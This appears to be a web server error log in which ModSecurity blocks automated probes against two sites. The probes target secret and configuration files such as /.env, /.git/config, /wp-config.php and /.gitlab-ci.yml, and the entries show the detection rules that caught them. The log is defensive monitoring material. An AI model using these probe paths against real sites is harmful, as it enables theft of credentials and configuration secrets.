[Sun Nov 16 18:08:51.539996 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRoFI6K4kxSjhxan99MlIQAAAAY"]
[Sun Nov 16 18:08:51.540186 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRoFI6K4kxSjhxan99MlIQAAAAY"]
[Sun Nov 16 18:08:51.886435 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRoFI4YUzNZoYnjqey4_KQAAAAc"]
[Sun Nov 16 18:08:51.886827 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRoFI4YUzNZoYnjqey4_KQAAAAc"]
[Sun Nov 16 18:08:51.887040 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aRoFI4YUzNZoYnjqey4_KQAAAAc"]
[Sun Nov 16 18:08:52.313179 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRoFJKK4kxSjhxan99MlIgAAAAY"]
[Sun Nov 16 18:08:52.313604 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRoFJKK4kxSjhxan99MlIgAAAAY"]
[Sun Nov 16 18:08:52.313826 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aRoFJKK4kxSjhxan99MlIgAAAAY"]
[Sun Nov 16 19:41:34.638121 2025] [:error] [pid 115922] [client 204.76.203.25:34834] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoa3pTB_QM564J_h8QYCgAAAAg"]
[Sun Nov 16 19:41:34.638478 2025] [:error] [pid 115922] [client 204.76.203.25:34834] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoa3pTB_QM564J_h8QYCgAAAAg"]
[Sun Nov 16 19:41:34.638675 2025] [:error] [pid 115922] [client 204.76.203.25:34834] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRoa3pTB_QM564J_h8QYCgAAAAg"]
[Sun Nov 16 21:20:03.976257 2025] [authz_core:error] [pid 115922] [client 146.190.63.248:57890] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 16 21:20:05.600872 2025] [:error] [pid 120103] [client 146.190.63.248:55024] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRox9QQCCftfgvVPg55lLQAAABI"]
[Sun Nov 16 21:20:05.601104 2025] [:error] [pid 120103] [client 146.190.63.248:55024] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRox9QQCCftfgvVPg55lLQAAABI"]
[Sun Nov 16 21:20:05.601284 2025] [:error] [pid 120103] [client 146.190.63.248:55024] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRox9QQCCftfgvVPg55lLQAAABI"]
[Sun Nov 16 21:20:06.100102 2025] [:error] [pid 120097] [client 146.190.63.248:55034] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRox9pt80SS-ken2daDxKwAAAAM"]
[Sun Nov 16 21:20:06.100321 2025] [:error] [pid 120097] [client 146.190.63.248:55034] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRox9pt80SS-ken2daDxKwAAAAM"]
[Sun Nov 16 21:20:06.100475 2025] [:error] [pid 120097] [client 146.190.63.248:55034] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRox9pt80SS-ken2daDxKwAAAAM"]
[Sun Nov 16 21:20:06.602913 2025] [:error] [pid 119514] [client 146.190.63.248:55040] [client 146.190.63.248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRox9iBNMh6AcL62fgQq0QAAAAA"]
[Sun Nov 16 21:20:06.604048 2025] [:error] [pid 119514] [client 146.190.63.248:55040] [client 146.190.63.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRox9iBNMh6AcL62fgQq0QAAAAA"]
[Sun Nov 16 21:20:06.604251 2025] [:error] [pid 119514] [client 146.190.63.248:55040] [client 146.190.63.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRox9iBNMh6AcL62fgQq0QAAAAA"]
[Mon Nov 17 23:43:07.691788 2025] [:error] [pid 144419] [client 195.178.110.130:57596] [client 195.178.110.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRuk-9eMjJ3pUKNKhJ6d0gAAAAA"]
[Mon Nov 17 23:43:07.693071 2025] [:error] [pid 144419] [client 195.178.110.130:57596] [client 195.178.110.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRuk-9eMjJ3pUKNKhJ6d0gAAAAA"]
[Mon Nov 17 23:43:07.693253 2025] [:error] [pid 144419] [client 195.178.110.130:57596] [client 195.178.110.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRuk-9eMjJ3pUKNKhJ6d0gAAAAA"]
[Tue Nov 18 03:30:58.108109 2025] [:error] [pid 154304] [client 172.71.148.62:10937] [client 172.71.148.62] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRvaYuC_jtjK_KxjdB8SPAAAAAs"]
[Tue Nov 18 03:30:58.108521 2025] [:error] [pid 154304] [client 172.71.148.62:10937] [client 172.71.148.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRvaYuC_jtjK_KxjdB8SPAAAAAs"]
[Tue Nov 18 03:30:58.108724 2025] [:error] [pid 154304] [client 172.71.148.62:10937] [client 172.71.148.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRvaYuC_jtjK_KxjdB8SPAAAAAs"]
[Tue Nov 18 06:11:08.029756 2025] [:error] [pid 154304] [client 45.144.212.58:39518] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRv_7OC_jtjK_KxjdB8STQAAAAs"]
[Tue Nov 18 06:11:08.030786 2025] [:error] [pid 154304] [client 45.144.212.58:39518] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRv_7OC_jtjK_KxjdB8STQAAAAs"]
[Tue Nov 18 06:11:08.030952 2025] [:error] [pid 154304] [client 45.144.212.58:39518] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRv_7OC_jtjK_KxjdB8STQAAAAs"]
[Tue Nov 18 07:10:38.898100 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRwN3hHo1z0h3O4bzTlo2gAAAAQ"]
[Tue Nov 18 07:10:38.901362 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRwN3hHo1z0h3O4bzTlo2gAAAAQ"]
[Tue Nov 18 07:10:38.901560 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRwN3hHo1z0h3O4bzTlo2gAAAAQ"]
[Tue Nov 18 07:10:39.135451 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRwN3xHo1z0h3O4bzTlo2wAAAAQ"]
[Tue Nov 18 07:10:39.138425 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRwN3xHo1z0h3O4bzTlo2wAAAAQ"]
[Tue Nov 18 07:10:39.138597 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRwN3xHo1z0h3O4bzTlo2wAAAAQ"]
[Tue Nov 18 07:10:39.647566 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3AAAAAQ"]
[Tue Nov 18 07:10:39.650646 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3AAAAAQ"]
[Tue Nov 18 07:10:39.650840 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3AAAAAQ"]
[Tue Nov 18 07:10:39.948197 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3QAAAAQ"]
[Tue Nov 18 07:10:39.951236 2025] [:error] [pid 153867] [client 195.178.110.201:51300] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRwN3xHo1z0h3O4bzTlo3QAAAAQ"]
